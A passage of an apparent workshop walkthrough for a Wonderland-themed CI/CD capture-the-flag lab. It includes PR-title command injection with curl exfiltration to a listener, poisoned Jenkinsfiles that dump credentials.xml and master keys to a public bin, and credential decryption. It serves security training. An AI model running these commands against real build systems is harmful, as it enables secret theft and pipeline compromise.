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262 lines (189 loc) · 5.31 KB

File metadata and controls

262 lines (189 loc) · 5.31 KB

This Walk Thru contains commands and snippets that will be used in the workshop, and should help save time from manually typing complex commands or copying and pasting from slides which may mangle text.

URL List


  • http://[randomhash]
    • alice/alice


  • http://[randomhash]
    • thealice/thealice


  • http://[randomhash]
    • alice/alice1234


  • http://[randomhash]
    • alice/alice

Slide 23

withCredentials([string(credentialsId: 'flag1', variable: 'flag1')])
    sh '''
        echo $flag1 |base64

Slide 24

Decode the flag

Replace {base64} with the base64 in the console output

echo "{base64}" | base64 -d

Slide 27

docker pull
git clone http://localhost:3000/Wonderland/duchess.git
docker run -v ./duchess/:/path detect --source="/path" -v
cd duchess
ls -al
git log -L 8,8:.pypirc 43f216c

Slide 31

Return to home from less exercise

cd ~

Get IP address of host network interface

ip addr show dev ens5
sudo netcat -nvlp 80

Go to Gitea instance




Paste this into pull request title, replace <YOUR SERVER IP> with the one you got from the ip addr command above.

`echo ${KEY} > key && curl -v -F file=@key <YOUR SERVER IP>`

Slide 35

git clone http://localhost:3000/Wonderland/mock-turtle.git

Use the same creds for gitea: thealice/thealice

cd mock-turtle
git checkout -b branch1
nano version

Update the version number

Save the file Ctrl-O

Exit nano Ctrl-X

Slide 36

nano Jenkinsfile

Paste this into the file at the line just below steps {:

withCredentials([usernamePassword(credentialsId: 'flag10', usernameVariable: 'USERNAME', passwordVariable: 'TOKEN')]) {
    sh 'echo $TOKEN | base64'

Save the file Ctrl-O

Exit nano Ctrl-X

Next commit the file change

git add version Jenkinsfile
git commit -m "New version"

Push the changes up to the repository

git push --set-upstream origin branch1

In Gitea navigate to the mock-turtle repo, and switch to the new branch branch1

Create a pull request and submit it.

The pull request should get autoapproved.

Go to Jenkins and you should see an automated build kicked off for the new "version".

Look at the console output of the new build.

Slide 41

Replace any with the below

{node 'built-in'}

e.g. agent {node 'built-in'}

Add the following to the sh """ block

cat $JENKINS_HOME/credentials.xml | base64
cat $JENKINS_HOME/secrets/master.key | base64
cat $JENKINS_HOME/secrets/hudson.util.Secret | base64
cat $JENKINS_HOME/flag5.txt

Your code should look like the below:

sh """
   virtualenv venv
   pip install -r requirements.txt | true
   cat $JENKINS_HOME/credentials.xml | base64
   cat $JENKINS_HOME/secrets/master.key | base64
   cat $JENKINS_HOME/secrets/hudson.util.Secret | base64
   cat $JENKINS_HOME/flag5.txt

Note: Jenkins is a fork of Hudson which was originally made by Sun Microsystems as an Open Source Project, then forked when Oracle bought it and wanted to trademark/monitize Hudson. So you'll sometimes see references to it such as in one of the files above.

Slide 42

Go to and create a public bin

stage('Install Requirements') {
  steps {
    sh """
      curl -X POST \
      -F "file1=\$(cat $JENKINS_HOME/credentials.xml | base64 -w 0 | rev)" \
      -F "file2=\$(cat $JENKINS_HOME/secrets/master.key | base64 -w 0 | rev)" \
      -F "file3=\$(cat $JENKINS_HOME/secrets/hudson.util.Secret |base64 -w 0 | rev)" \
      -F "file4=\$(cat $JENKINS_HOME/flag5.txt | base64 | rev)" \


Extract the creds

For each of the files you need to decode them and write them to the a file.

echo "{base64}" | rev | base64 -d > credentials.xml
echo "{base64}" |rev |base64 -d > master.key
echo "{base64}" |rev base64 -d > hudson.util.Secret

We can use a docker image with a Jenkins credential storage decrypter from here.

docker run \
  --rm \
  --network none \
  --workdir / \
  --mount "type=bind,src=$PWD/master.key,dst=/master.key" \
  --mount "type=bind,src=$PWD/hudson.util.Secret,dst=/hudson.util.Secret" \
  --mount "type=bind,src=$PWD/credentials.xml,dst=/credentials.xml" \ \
  /jenkins-credentials-decryptor \
    -m master.key \
    -s hudson.util.Secret \
    -c credentials.xml \
    -o json


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